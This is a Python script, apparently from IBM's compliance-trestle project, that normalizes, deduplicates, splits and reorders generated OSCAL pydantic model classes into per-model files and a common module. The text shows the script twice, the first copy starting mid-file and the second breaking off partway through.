'poam': 'plan-of-action-and-milestones', 'profile': 'profile', 'ssp': 'system-security-plan' } camel_map = { 'assessment_plan': 'AssessmentPlan', 'assessment_results': 'AssessmentResults', 'catalog': 'Catalog', 'component': 'ComponentDefinition', 'poam': 'PlanOfActionAndMilestones', 'profile': 'Profile', 'ssp': 'SystemSecurityPlan' } prefix_map = { 'assessment_plan': 'Ap', 'assessment_results': 'Ar', 'catalog': 'Cat', 'component': 'Comp', 'poam': 'Poam', 'profile': 'Prof', 'ssp': 'Ssp' } # these prefixes are stripped repeatedly from class names until no more changes prefixes_to_strip = [ 'OscalMetadata', 'OscalAssessmentCommon', 'OscalImplementationCommon', 'OscalComponentDefinition', 'OscalCatalog', 'OscalSsp', 'OscalPoam', 'OscalProfile', 'OscalAr', 'OscalAp', 'Common' ] license_header = ( '# -*- mode:python; coding:utf-8 -*-\n' '# Copyright (c) 2020 IBM Corp. All rights reserved.\n' '#\n' '# Licensed under the Apache License, Version 2.0 (the "License");\n' '# you may not use this file except in compliance with the License.\n' '# You may obtain a copy of the License at\n' '#\n' '# https://www.apache.org/licenses/LICENSE-2.0\n' '#\n' '# Unless required by applicable law or agreed to in writing, software\n' '# distributed under the License is distributed on an "AS IS" BASIS,\n' '# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n' '# See the License for the specific language governing permissions and\n' '# limitations under the License.\n' ) main_header = """ from __future__ import annotations from datetime import datetime from enum import Enum from typing import Any, Dict, List, Optional from pydantic import AnyUrl, EmailStr, Extra, Field, conint, constr from trestle.core.base_model import OscalBaseModel """ class RelOrder(): """Capture relative location of each class in list to its refs and deps.""" def __init__(self, max_index): """Initialize with size of list being reordered.""" self.latest_dep = 0 self.earliest_ref = max_index class ClassText(): """Hold class text as named blocks with references to the added classes and capture its refs.""" def __init__(self, first_line, parent_name): """Construct with first line of class definition and store the parent file name.""" self.lines = [first_line.rstrip()] n = first_line.find('(') self.name = first_line[len(class_header):n] self.parent_names = [parent_name] self.original_name = self.name self.unique_name = None self.refs = set() self.full_refs = set() self.found_all_links = False self.is_self_ref = False self.is_local = False self.body_text = None def add_line(self, line): """Add new line to class text.""" self.lines.append(line) def add_ref_if_good(self, ref_name): """Add non-empty refs that are not in common.""" if ref_name and 'common.' not in ref_name: self.refs.add(ref_name) def add_ref_pattern(self, p, line): """Add refs for new class names found based on pattern.""" new_refs = p.findall(line) if new_refs: for r in new_refs: if type(r) == tuple: for s in r: self.add_ref_if_good(s) else: self.add_ref_if_good(r) @staticmethod def find_index(class_text_list, name): """Find index of class in list by name.""" nclasses = len(class_text_list) for i in range(nclasses): if class_text_list[i].name == name: return i return -1 def generate_body_text(self): """Get body text with whitespace removed.""" # The body starts after the first colon full_text = '' for line in self.lines: # this adds the line with whitespace removed full_text += ''.join(line.split(' ')) colon = full_text.find(':') self.body_text = full_text[colon:] @staticmethod def generate_all_body_text(classes): """Get teh body of all classses into text.""" new_classes = [] for c in classes: c.generate_body_text() new_classes.append(c) return new_classes def bodies_equal(self, other): """Are class bodies equal with whitespace ignored.""" return self.body_text == other.body_text def add_all_refs(self, line): """Find all refd class names found in line and add to references.""" # find lone strings with no brackets p = re.compile(r'.*\:\s*([^\s\[\]]+).*') self.add_ref_pattern(p, line) # find objects in one or more bracket sets with possible first token and comma p = re.compile(r'.*\[(?:(.*),\s*)?((?:\[??[^\[]*?))\]') self.add_ref_pattern(p, line) # add refs found in optional unions p = re.compile(r'.*Optional\[Union\[([^,]+)') self.add_ref_pattern(p, line) return line def find_direct_refs(self, class_names_list): """Find direct refs without recursion.""" for ref in self.refs: if ref == self.name: self.is_self_ref = True if ref in class_names_list and not ref == self.name: self.full_refs.add(ref) if len(self.full_refs) == 0: self.found_all_links = True def find_order(self, class_text_list): """Find latest dep and earliest reference.""" ro = RelOrder(len(class_text_list) - 1) # find first class that needs this class for i, ct in enumerate(class_text_list): if self.name in ct.full_refs: ro.earliest_ref = i break # find last class this one needs # make sure result is deterministic and does not depend on order from set sorted_ref_list = sorted(self.full_refs) for ref in sorted_ref_list: n = ClassText.find_index(class_text_list, ref) if n > ro.latest_dep: ro.latest_dep = n return ro def strip_prefix(self, prefix): """Strip the prefix from the class name only.""" if self.name.startswith(prefix) and self.name != prefix: self.name = self.name.replace(prefix, '', 1) return True return False def find_forward_refs(class_list, orders): """Find forward references within the file.""" forward_names = set() for c in class_list: if c.is_self_ref: forward_names.add(c.name) for i in range(len(orders)): if orders[i].earliest_ref < i: forward_names.add(class_list[i].name) forward_refs = [] for c in class_list: if c.name in forward_names: forward_refs.append(f'{c.name}.update_forward_refs()') return forward_refs def reorder(fstem, class_list): """Reorder the class list based on the location of its refs and deps.""" # build list of all class names defined in file all_class_names = [] for c in class_list: all_class_names.append(c.name) dups = {x for x in all_class_names if all_class_names.count(x) > 1} if len(dups) > 0: logger.error(f'ERROR Duplicate classes in {fstem}: {' '.join(dups)}') # find direct references for each class in list for n, c in enumerate(class_list): c.find_direct_refs(all_class_names) class_list[n] = c # with full dependency info, now reorder the classes to remove forward refs did_swap = True loop_num = 0 orders = None while did_swap and loop_num < 1000: did_swap = False orders = [] # find the relative placement of each class in list to its references and dependencies for c in class_list: ro = c.find_order(class_list) orders.append(ro) # find first class in list out of place and swap its dependency upwards, then break/loop to find new order for i, ro in enumerate(orders): if ro.latest_dep <= i <= ro.earliest_ref: continue # pop the out-of-place earliest ref and put it in front ct = class_list.pop(ro.earliest_ref) class_list.insert(i, ct) did_swap = True break loop_num += 1 if did_swap: logger.info('Excess iteration in reordering!') forward_refs = find_forward_refs(class_list, orders) # return reordered list of classes with no forward refs return class_list, forward_refs def constrain_oscal_version(class_list): """Constrain allowed oscal version.""" for j in range(len(class_list)): cls = class_list[j] for i in range(len(cls.lines)): line = cls.lines[i] nstart = line.find('oscal_version:') if nstart >= 0: nstr = line.find('str') if nstr >= 0: cls.lines[i] = line.replace('str', f'constr(regex={OSCAL_VERSION_REGEX})') class_list[j] = cls return class_list def load_classes(fstem): """Load all classes from a python file.""" all_classes = [] header = [] forward_refs = [] class_text = None done_header = False fname = pathlib.Path('trestle/oscal/tmp') / (fstem + '.py') with open(fname, 'r', encoding='utf8') as infile: for r in infile.readlines(): # collect forward references if r.find('.update_forward_refs()') >= 0: forward_refs.append(r) elif r.find(class_header) == 0: # start of new class done_header = True if class_text is not None: # we are done with current class so add it all_classes.append(class_text) class_text = ClassText(r, fstem) else: if not done_header: # still in header header.append(r.rstrip()) else: # this may not be needed p = re.compile(r'.*Optional\[Union\[([^,]+),.*List\[Any\]') refs = p.findall(r) if len(refs) == 1: logger.info(f'Replaced Any with {refs[0]} in {fstem}') r_orig = r r = r.replace('List[Any]', f'List[{refs[0]}]') logger.info(f'{r_orig} -> {r}') class_text.add_line(r.rstrip()) all_classes.append(class_text) # don't forget final class # force all oscal versions to the current one all_classes = constrain_oscal_version(all_classes) return all_classes def load_all_classes(): """Load all classes from all files on per file basis.""" all_classes = [] for fstem in fstems: all_classes.extend(load_classes(fstem)) return all_classes def keep_distinct(a, b): """If class names don't resolve to the same value then keep separate.""" # It is possible two classes with very different names have the same bodies # This is allowed if the names are different enough since they provide useful context stripped_classes = strip_prefixes([a, b]) a = stripped_classes[0] b = stripped_classes[1] if a.name == b.name: return False return True def find_unique_classes(all_classes): """Find unique classes based mainly on bodies.""" unique_classes = [] all_classes = ClassText.generate_all_body_text(all_classes) for a in all_classes: # ignore the Model class - it is added at end if a.name == 'Model': continue is_unique = True for i, u in enumerate(unique_classes): if a.bodies_equal(u): if keep_distinct(a, u): continue is_unique = False unique_classes[i].parent_names.append(a.parent_names[0]) break if is_unique: a.unique_name = a.name unique_classes.append(a) return unique_classes def strip_prefixes(classes): """Strip prefixes from class names.""" new_classes = [] # are we stripping all names in a file full_file = len(classes) > 2 all_names = [c.name for c in classes] for c in classes: made_change = True # keep stripping til clean while made_change: made_change = False for prefix in prefixes_to_strip: if c.strip_prefix(prefix): # if we generated a collision with existing name, append integer if full_file and c.name in all_names: ii = 1 while f'c.name{ii}' in all_names: ii += 1 c.name = f'{c.name}{ii}' made_change = True new_classes.append(c) return new_classes def fix_clashes(classes): """Fix clashes in names.""" # If two classes have the same name and different bodies, adjust each name # Leave bodies alone # each new class name will be local to its one parent file nclasses = len(classes) changes = [] for i in range(nclasses): for j in range(i + 1, nclasses): if classes[i].name == classes[j].name: a = classes[i] b = classes[j] if a.bodies_equal(b): continue a_parents = a.parent_names b_parents = b.parent_names for a_parent in a_parents: for b_parent in b_parents: a_pre = prefix_map[a_parent] a_new = a.name if a.name.startswith(a_pre) else a_pre + '_' + a.name b_pre = prefix_map[b_parent] b_new = b.name if b.name.startswith(b_pre) else b_pre + '_' + b.name changes.append((a_parent, a.name, a_new)) changes.append((b_parent, b.name, b_new)) # now make the actual class name changes new_classes = [] for c in classes: for change in changes: for parent_name in c.parent_names: # find the one class with parent that matches the change - and change only its name if parent_name == change[0] and c.name == change[1]: c.name = change[2] # mark the class as local to the one file c.is_local = True break new_classes.append(c) return new_classes def token_in_line(line, token): """Find if token is present in string.""" # the second regex needs to include digits for Base64 vs. Base, Type vs. Type1 etc. pattern = r'(^|[^a-zA-Z_]+)' + token + r'($|[^a-zA-Z0-9_]+)' p = re.compile(pattern) hits = p.findall(line) return len(hits) > 0 def replace_token(line, str1, str2): """Replace token str1 with new str2 in line.""" # pull out what you want to keep on left and right # rather than capture what you want and replace it if str1 not in line: return line pattern = r'(^|.*[^a-zA-Z_]+)' + str1 + r'($|[^a-zA-Z0-9_]+.*)' line = re.sub(pattern, r'\1' + str2 + r'\2', line) return line def is_common(cls): """Class is not common if _ in name or only one parent.""" if '_' in cls.name: return False if len(cls.parent_names) == 1: return False return True def _list_to_file_classes(classes): file_classes = {} for stem in fstems: file_classes[stem] = [] file_classes['common'] = [] for c in classes: file_classes[c.parent_names[0]].append(c) return file_classes def _file_classes_to_list(file_classes, exclude_common): classes = [] for item in file_classes.items(): if item[0] == 'common' and exclude_common: continue for c in item[1]: classes.append(c) return classes def refine_split(file_classes): """Make sure no references in common link to the other files.""" # get list of original names in current common file common_names = [] for c in file_classes['common']: common_names.append(c.unique_name) # find all original names of classes in other files that shouldn't be refd by common names = set() for stem in fstems: for c in file_classes[stem]: if (c.is_local) or (c.unique_name not in common_names): names.add(c.unique_name) names = list(names) # if any common class references outside common - exclude it from common not_com = [] for c in file_classes['common']: excluded = False for line in c.lines: if excluded: break if '"' not in line and "'" not in line: for name in names: if token_in_line(line, name): not_com.append(c.name) excluded = True break # remove all not_com from com and add to other files as needed by parents new_com = [] for c in file_classes['common']: if c.name in not_com: for parent in c.parent_names: file_classes[parent].append(c) else: new_com.append(c) file_classes['common'] = new_com return file_classes def _find_in_classes(name, file_classes): # debugging utility found = [] for item in file_classes.items(): for c in item[1]: if name in c.name: found.append((item[0], c.name)) return found def _find_in_class_list(name, classes): # debugging utility found = [] for c in classes: if name in c.name: found.append((name, c.name)) return found def split_classes(classes): """Split into separate common and other files.""" file_classes = {} for stem in fstems: file_classes[stem] = [] file_classes['common'] = [] com_names = [] for c in classes: if is_common(c): if c.name not in com_names: com_names.append(c.name) file_classes['common'].append(c) else: # remove clash prefix from the class name if present # the prefix is removed from bodies after the split c.name = c.name.split('_')[-1] for parent in c.parent_names: # the class carries with it that it is local and bound to the parent file_classes[parent].append(c) # keep removing classes in com that have external dependencies until it is clean new_ncom = 0 while new_ncom != len(file_classes['common']): new_ncom = len(file_classes['common']) file_classes = refine_split(file_classes) return file_classes def reorder_classes(fstem, classes): """Reorder the classes to minimize needed forwards.""" classes = sorted(classes, key=lambda c: c.name) new_classes = [] for c in classes: for line in c.lines: _ = c.add_all_refs(line) new_classes.append(c) reordered, forward_refs = reorder(fstem, new_classes) return reordered, forward_refs def write_oscal(classes, forward_refs, fstem): """Write out oscal.py with all classes in it.""" with open(f'trestle/oscal/{fstem}.py', 'w', encoding='utf8') as out_file: is_common = fstem == 'common' out_file.write(license_header) out_file.write('\n') out_file.write(main_header) if not is_common: out_file.write('import trestle.oscal.common as common\n') out_file.write('\n\n') for c in classes: out_file.writelines('\n'.join(c.lines) + '\n') if not is_common: out_file.writelines('class Model(OscalBaseModel):\n') alias = alias_map[fstem] snake = alias.replace('-', '_') class_name = camel_map[fstem] if '-' in alias: out_file.writelines(f" {snake}: {class_name} = Field(..., alias='{alias}')\n") else: out_file.writelines(f' {snake}: {class_name}\n') if forward_refs: if not is_common: out_file.writelines('\n\n') out_file.writelines('\n'.join(forward_refs) + '\n') def apply_changes_to_class_list(classes, changes): """Make all changes to the name and body of a list of classes.""" for i, c in enumerate(classes): lines = [] for line in c.lines: if 'title=' not in line and 'description=' not in line: for item in changes: if item[0] in line: line = replace_token(line, item[0], item[1]) lines.append(line) classes[i].lines = lines # make sure class definition has correct name paren = lines[0].find('(') class_name = classes[i].name if paren > 0: class_name = lines[0][len('class '):paren] classes[i].name = class_name # need to regenerate body since tokens changed classes[i].generate_body_text() return classes def apply_changes_to_classes(file_classes, changes, com_names): """Apply changes to dict of classes organized by file.""" for fc in file_classes.items(): classes = fc[1] for i, c in enumerate(classes): lines = [] for line in c.lines: if 'title=' not in line and 'description=' not in line: for item in changes.items(): if item[0] not in line: continue new_name = item[1] # if not in common then need to add common. to common names if fc[0] != 'common' and new_name in com_names: tentative_name = 'common.' + new_name if tentative_name not in line: new_name = tentative_name line = replace_token(line, item[0], new_name) lines.append(line) classes[i].lines = lines # class name may have been replaced by change - so update with new name paren = lines[0].find('(') class_name = classes[i].name if paren > 0: class_name = lines[0][len('class '):paren] classes[i].name = class_name classes[i].generate_body_text() file_classes[fc[0]] = classes return file_classes def reorder_and_dump_as_python(file_classes): """Reorder the files and dump.""" for item in file_classes.items(): ordered, forward_refs = reorder_classes(item[0], item[1]) write_oscal(ordered, forward_refs, item[0]) def find_full_changes(file_classes): """Find all name changes and what files made them.""" changes = {} com_names = [] for c in file_classes['common']: changes[c.unique_name] = c.name com_names.append(c.name) for fstem in fstems: for c in file_classes[fstem]: changes[c.unique_name] = c.name return changes, com_names def kill_min_items(classes): """Kill all references to min_items=1.""" # NOTE! This changes all constr list to normal List for i, c in enumerate(classes): for j, line in enumerate(c.lines): c.lines[j] = line.replace(', min_items=1', '') classes[i] = c return classes def fix_include_all(classes): """Replace [IncludeAll] with [Any].""" for i, c in enumerate(classes): for j, line in enumerate(c.lines): c.lines[j] = line.replace('[IncludeAll]', '[Any]') classes[i] = c return classes def strip_file(classes): """Given set of classes from a file strip all names and apply changes to references in the bodies.""" classes = strip_prefixes(classes) changes = [] for c in classes: changes.append((c.original_name, c.name)) return apply_changes_to_class_list(classes, changes) def _strip_all_files(file_classes): for item in file_classes.items(): stem = item[0] if item[0] != 'common': file_classes[stem] = strip_file(file_classes[stem]) return file_classes def update_refs_per_file(classes): """Change all refs to the _ versions.""" changes = [] for c in classes: if '_' in c.name: changes.append((c.name.split('_')[1], c.name)) classes = apply_changes_to_class_list(classes, changes) return classes def normalize_files(): """Clean up classes to minimise cross reference.""" all_classes = load_all_classes() # kill the min_items immediately uc = kill_min_items(all_classes) # fix IncludeAll that isn't defined properly in schema uc = fix_include_all(all_classes) # organize in a dict with filename as key file_classes = _list_to_file_classes(all_classes) # strip all names and bodies file_classes = _strip_all_files(file_classes) # convert dict to single list of classes with expected duplicates uc = _file_classes_to_list(file_classes, True) # find all unique classes based on body text uc = find_unique_classes(uc) # find classes with same name and different bodies - and modify class names with _ # bodies are not changed uc = fix_clashes(uc) # now have unique list of classes with unique names # some names have _ in them to be removed later # make sure all classes have the proper unique name set at this point for c in uc: c.unique_name = c.name # some class names have _ in them, so change refs in each file to include the _ uc = update_refs_per_file(uc) # split the classes based on current name and whether referenced by only one file file_classes = split_classes(uc) # find all changes from old name to new changes, com_names = find_full_changes(file_classes) # now apply all the changes to the class bodies file_classes = apply_changes_to_classes(file_classes, changes, com_names) # re-order them in each file and dump reorder_and_dump_as_python(file_classes) # this will leave files with raw formatting and make code-format must be run separately if __name__ == '__main__': """Main invocation.""" normalize_files()
# -*- mode:python; coding:utf-8 -*- # Copyright (c) 2020 IBM Corp. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Script to normalize oscal after significant changes with version 1.0.0. It then reorders the classes so there are minimal forwards required. This script is normally called by gen_oscal.py when models are generated. """ import logging import pathlib import re from trestle.oscal import OSCAL_VERSION_REGEX logger = logging.getLogger(__name__) logger.setLevel(logging.INFO) logger.addHandler(logging.StreamHandler()) class_header = 'class ' # List of filestems not including 'complete' or 'common' # 'common' is generated by this script. 'complete.py' comes from NIST and is ignored fstems = ['assessment_plan', 'assessment_results', 'catalog', 'component', 'poam', 'profile', 'ssp'] alias_map = { 'assessment_plan': 'assessment-plan', 'assessment_results': 'assessment-results', 'catalog': 'catalog', 'component': 'component-definition', 'poam': 'plan-of-action-and-milestones', 'profile': 'profile', 'ssp': 'system-security-plan' } camel_map = { 'assessment_plan': 'AssessmentPlan', 'assessment_results': 'AssessmentResults', 'catalog': 'Catalog', 'component': 'ComponentDefinition', 'poam': 'PlanOfActionAndMilestones', 'profile': 'Profile', 'ssp': 'SystemSecurityPlan' } prefix_map = { 'assessment_plan': 'Ap', 'assessment_results': 'Ar', 'catalog': 'Cat', 'component': 'Comp', 'poam': 'Poam', 'profile': 'Prof', 'ssp': 'Ssp' } # these prefixes are stripped repeatedly from class names until no more changes prefixes_to_strip = [ 'OscalMetadata', 'OscalAssessmentCommon', 'OscalImplementationCommon', 'OscalComponentDefinition', 'OscalCatalog', 'OscalSsp', 'OscalPoam', 'OscalProfile', 'OscalAr', 'OscalAp', 'Common' ] license_header = ( '# -*- mode:python; coding:utf-8 -*-\n' '# Copyright (c) 2020 IBM Corp. All rights reserved.\n' '#\n' '# Licensed under the Apache License, Version 2.0 (the "License");\n' '# you may not use this file except in compliance with the License.\n' '# You may obtain a copy of the License at\n' '#\n' '# https://www.apache.org/licenses/LICENSE-2.0\n' '#\n' '# Unless required by applicable law or agreed to in writing, software\n' '# distributed under the License is distributed on an "AS IS" BASIS,\n' '# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n' '# See the License for the specific language governing permissions and\n' '# limitations under the License.\n' ) main_header = """ from __future__ import annotations from datetime import datetime from enum import Enum from typing import Any, Dict, List, Optional from pydantic import AnyUrl, EmailStr, Extra, Field, conint, constr from trestle.core.base_model import OscalBaseModel """ class RelOrder(): """Capture relative location of each class in list to its refs and deps.""" def __init__(self, max_index): """Initialize with size of list being reordered.""" self.latest_dep = 0 self.earliest_ref = max_index class ClassText(): """Hold class text as named blocks with references to the added classes and capture its refs.""" def __init__(self, first_line, parent_name): """Construct with first line of class definition and store the parent file name.""" self.lines = [first_line.rstrip()] n = first_line.find('(') self.name = first_line[len(class_header):n] self.parent_names = [parent_name] self.original_name = self.name self.unique_name = None self.refs = set() self.full_refs = set() self.found_all_links = False self.is_self_ref = False self.is_local = False self.body_text = None def add_line(self, line): """Add new line to class text.""" self.lines.append(line) def add_ref_if_good(self, ref_name): """Add non-empty refs that are not in common.""" if ref_name and 'common.' not in ref_name: self.refs.add(ref_name) def add_ref_pattern(self, p, line): """Add refs for new class names found based on pattern.""" new_refs = p.findall(line) if new_refs: for r in new_refs: if type(r) == tuple: for s in r: self.add_ref_if_good(s) else: self.add_ref_if_good(r) @staticmethod def find_index(class_text_list, name): """Find index of class in list by name.""" nclasses = len(class_text_list) for i in range(nclasses): if class_text_list[i].name == name: return i return -1 def generate_body_text(self): """Get body text with whitespace removed.""" # The body starts after the first colon full_text = '' for line in self.lines: # this adds the line with whitespace removed full_text += ''.join(line.split(' ')) colon = full_text.find(':') self.body_text = full_text[colon:] @staticmethod def generate_all_body_text(classes): """Get teh body of all classses into text.""" new_classes = [] for c in classes: c.generate_body_text() new_classes.append(c) return new_classes def bodies_equal(self, other): """Are class bodies equal with whitespace ignored.""" return self.body_text == other.body_text def add_all_refs(self, line): """Find all refd class names found in line and add to references.""" # find lone strings with no brackets p = re.compile(r'.*\:\s*([^\s\[\]]+).*') self.add_ref_pattern(p, line) # find objects in one or more bracket sets with possible first token and comma p = re.compile(r'.*\[(?:(.*),\s*)?((?:\[??[^\[]*?))\]') self.add_ref_pattern(p, line) # add refs found in optional unions p = re.compile(r'.*Optional\[Union\[([^,]+)') self.add_ref_pattern(p, line) return line def find_direct_refs(self, class_names_list): """Find direct refs without recursion.""" for ref in self.refs: if ref == self.name: self.is_self_ref = True if ref in class_names_list and not ref == self.name: self.full_refs.add(ref) if len(self.full_refs) == 0: self.found_all_links = True def find_order(self, class_text_list): """Find latest dep and earliest reference.""" ro = RelOrder(len(class_text_list) - 1) # find first class that needs this class for i, ct in enumerate(class_text_list): if self.name in ct.full_refs: ro.earliest_ref = i break # find last class this one needs # make sure result is deterministic and does not depend on order from set sorted_ref_list = sorted(self.full_refs) for ref in sorted_ref_list: n = ClassText.find_index(class_text_list, ref) if n > ro.latest_dep: ro.latest_dep = n return ro def strip_prefix(self, prefix): """Strip the prefix from the class name only.""" if self.name.startswith(prefix) and self.name != prefix: self.name = self.name.replace(prefix, '', 1) return True return False def find_forward_refs(class_list, orders): """Find forward references within the file.""" forward_names = set() for c in class_list: if c.is_self_ref: forward_names.add(c.name) for i in range(len(orders)): if orders[i].earliest_ref < i: forward_names.add(class_list[i].name) forward_refs = [] for c in class_list: if c.name in forward_names: forward_refs.append(f'{c.name}.update_forward_refs()') return forward_refs def reorder(fstem, class_list): """Reorder the class list based on the location of its refs and deps.""" # build list of all class names defined in file all_class_names = [] for c in class_list: all_class_names.append(c.name) dups = {x for x in all_class_names if all_class_names.count(x) > 1} if len(dups) > 0: logger.error(f'ERROR Duplicate classes in {fstem}: {" ".join(dups)}') # find direct references for each class in list for n, c in enumerate(class_list): c.find_direct_refs(all_class_names) class_list[n] = c # with full dependency info, now reorder the classes to remove forward refs did_swap = True loop_num = 0 orders = None while did_swap and loop_num < 1000: did_swap = False orders = [] # find the relative placement of each class in list to its references and dependencies for c in class_list: ro = c.find_order(class_list) orders.append(ro) # find first class in list out of place and swap its dependency upwards, then break/loop to find new order for i, ro in enumerate(orders): if ro.latest_dep <= i <= ro.earliest_ref: continue # pop the out-of-place earliest ref and put it in front ct = class_list.pop(ro.earliest_ref) class_list.insert(i, ct) did_swap = True break loop_num += 1 if did_swap: logger.info('Excess iteration in reordering!') forward_refs = find_forward_refs(class_list, orders) # return reordered list of classes with no forward refs return class_list, forward_refs def constrain_oscal_version(class_list): """Constrain allowed oscal version.""" for j in range(len(class_list)): cls = class_list[j] for i in range(len(cls.lines)): line = cls.lines[i] nstart = line.find('oscal_version:') if nstart >= 0: nstr = line.find('str') if nstr >= 0: cls.lines[i] = line.replace('str', f'constr(regex={OSCAL_VERSION_REGEX})') class_list[j] = cls return class_list def load_classes(fstem): """Load all classes from a python file.""" all_classes = [] header = [] forward_refs = [] class_text = None done_header = False fname = pathlib.Path('trestle/oscal/tmp') / (fstem + '.py') with open(fname, 'r', encoding='utf8') as infile: for r in infile.readlines(): # collect forward references if r.find('.update_forward_refs()') >= 0: forward_refs.append(r) elif r.find(class_header) == 0: # start of new class done_header = True if class_text is not None: # we are done with current class so add it all_classes.append(class_text) class_text = ClassText(r, fstem) else: if not done_header: # still in header header.append(r.rstrip()) else: # this may not be needed p = re.compile(r'.*Optional\[Union\[([^,]+),.*List\[Any\]') refs = p.findall(r) if len(refs) == 1: logger.info(f'Replaced Any with {refs[0]} in {fstem}') r_orig = r r = r.replace('List[Any]', f'List[{refs[0]}]') logger.info(f'{r_orig} -> {r}') class_text.add_line(r.rstrip()) all_classes.append(class_text) # don't forget final class # force all oscal versions to the current one all_classes = constrain_oscal_version(all_classes) return all_classes def load_all_classes(): """Load all classes from all files on per file basis.""" all_classes = [] for fstem in fstems: all_classes.extend(load_classes(fstem)) return all_classes def keep_distinct(a, b): """If class names don't resolve to the same value then keep separate.""" # It is possible two classes with very different names have the same bodies # This is allowed if the names are different enough since they provide useful context stripped_classes = strip_prefixes([a, b]) a = stripped_classes[0] b = stripped_classes[1] if a.name == b.name: return False return True def find_unique_classes(all_classes): """Find unique classes based mainly on bodies.""" unique_classes = [] all_classes = ClassText.generate_all_body_text(all_classes) for a in all_classes: # ignore the Model class - it is added at end if a.name == 'Model': continue is_unique = True for i, u in enumerate(unique_classes): if a.bodies_equal(u): if keep_distinct(a, u): continue is_unique = False unique_classes[i].parent_names.append(a.parent_names[0]) break if is_unique: a.unique_name = a.name unique_classes.append(a) return unique_classes def strip_prefixes(classes): """Strip prefixes from class names.""" new_classes = [] # are we stripping all names in a file full_file = len(classes) > 2 all_names = [c.name for c in classes] for c in classes: made_change = True # keep stripping til clean while made_change: made_change = False for prefix in prefixes_to_strip: if c.strip_prefix(prefix): # if we generated a collision with existing name, append integer if full_file and c.name in all_names: ii = 1 while f'c.name{ii}' in all_names: ii += 1 c.name = f'{c.name}{ii}' made_change = True new_classes.append(c) return new_classes def fix_clashes(classes): """Fix clashes in names.""" # If two classes have the same name and different bodies, adjust each name # Leave bodies alone # each new class name will be local to its one parent file nclasses = len(classes) changes = [] for i in range(nclasses): for j in range(i + 1, nclasses): if classes[i].name == classes[j].name: a = classes[i] b = classes[j] if a.bodies_equal(b): continue a_parents = a.parent_names b_parents = b.parent_names for a_parent in a_parents: for b_parent in b_parents: a_pre = prefix_map[a_parent] a_new = a.name if a.name.startswith(a_pre) else a_pre + '_' + a.name b_pre = prefix_map[b_parent] b_new = b.name if b.name.startswith(b_pre) else b_pre + '_' + b.name changes.append((a_parent, a.name, a_new)) changes.append((b_parent, b.name, b_new)) # now make the actual class name changes new_classes = [] for c in classes: for change in changes: for parent_name in c.parent_names: # find the one class with parent that matches the change - and change only its name if parent_name == change[0] and c.name == change[1]: c.name = change[2] # mark the class as local to the one file c.is_local = True break new_classes.append(c) return new_classes def token_in_line(line, token): """Find if token is present in string.""" # the second regex needs to include digits for Base64 vs. Base, Type vs. Type1 etc. pattern = r'(^|[^a-zA-Z_]+)' + token + r'($|[^a-zA-Z0-9_]+)' p = re.compile(pattern) hits = p.findall(line) return len(hits) > 0 def replace_token(line, str1, str2): """Replace token str1 with new str2 in line.""" # pull out what you want to keep on left and right # rather than capture what you want and replace it if str1 not in line: return line pattern = r'(^|.*[^a-zA-Z_]+)' + str1 + r'($|[^a-zA-Z0-9_]+.*)' line = re.sub(pattern, r'\1' + str2 + r'\2', line) return line def is_common(cls): """Class is not common if _ in name or only one parent.""" if '_' in cls.name: return False if len(cls.parent_names) == 1: return False return True def _list_to_file_classes(classes): file_classes = {} for stem in fstems: file_classes[stem] = [] file_classes['common'] = [] for c in classes: file_classes[c.parent_names[0]].append(c) return file_classes def _file_classes_to_list(file_classes, exclude_common): classes = [] for item in file_classes.items(): if item[0] == 'common' and exclude_common: continue for c in item[1]: classes.append(c) return classes def refine_split(file_classes): """Make sure no references in common link to the other files.""" # get list of original names in current common file common_names = [] for c in file_classes['common']: common_names.append(c.unique_name) # find all original names of classes in other files that shouldn't be refd by common names = set() for stem in fstems: for c in file_classes[stem]: if (c.is_local) or (c.unique_name not in common_names): names.add(c.unique_name) names = list(names) # if any common class references outside common - exclude it from common not_com = [] for c in file_classes['common']: excluded = False for line in c.lines: if excluded: break if '"' not in line and "'" not in line: for name in names: if token_in_line(line, name): not_com.append(c.name) excluded = True break # remove all not_com from com and add to other files as needed by parents new_com = [] for c in file_classes['common']: if c.name in not_com: for parent in c.parent_names: file_classes[parent].append(c) else: new_com.append(c) file_classes['common'] = new_com return file_classes def _find_in_classes(name, file_classes): # debugging utility found = [] for item in file_classes.items(): for c in item[1]: if name in c.name: found.append((item[0], c.name)) return found def _find_in_class_list(name, classes): # debugging utility found = [] for c in classes: if name in c.name: found.append((name, c.name)) return found def split_classes(classes): """Split into separate common and other files.""" file_classes = {} for stem in fstems: file_classes[stem] = [] file_classes['common'] = [] com_names = [] for c in classes: if is_common(c): if c.name not in com_names: com_names.append(c.name) file_classes['common'].append(c) else: # remove clash prefix from the class name if present # the prefix is removed from bodies after the split c.name = c.name.split('_')[-1] for parent in c.parent_names: # the class carries with it that it is local and bound to the parent file_classes[parent].append(c) # keep removing classes in com that have external dependencies until it is clean new_ncom = 0 while new_ncom != len(file_classes['common']): new_ncom = len(file_classes['common']) file_classes = refine_split(file_classes) return file_classes def reorder_classes(fstem, classes): """Reorder the classes to minimize needed forwards.""" classes = sorted(classes, key=lambda c: c.name) new_classes = [] for c in classes: for line in c.lines: _ = c.add_all_refs(line) new_classes.append(c) reordered, forward_refs = reorder(fstem, new_classes) return reordered, forward_refs def write_oscal(classes, forward_refs, fstem): """Write out oscal.py with all classes in it.""" with open(f'trestle/oscal/{fstem}.py', 'w', encoding='utf8') as out_file: is_common = fstem == 'common' out_file.write(license_header) out_file.write('\n') out_file.write(main_header) if not is_common: out_file.write('import trestle.oscal.common as common\n') out_file.write('\n\n') for c in classes: out_file.writelines('\n'.join(c.lines) + '\n') if not is_common: out_file.writelines('class Model(OscalBaseModel):\n') alias = alias_map[fstem] snake = alias.replace('-', '_') class_name = camel_map[fstem] if '-' in alias: out_file.writelines(f" {snake}: {class_name} = Field(..., alias='{alias}')\n") else: out_file.writelines(f' {snake}: {class_name}\n') if forward_refs: if not is_common: out_file.writelines('\n\n') out_file.writelines('\n'.join(forward_refs) + '\n') def apply_changes_to_class_list(classes, changes): """Make all changes to the name and body of a list of classes.""" for i, c in enumerate(classes): lines 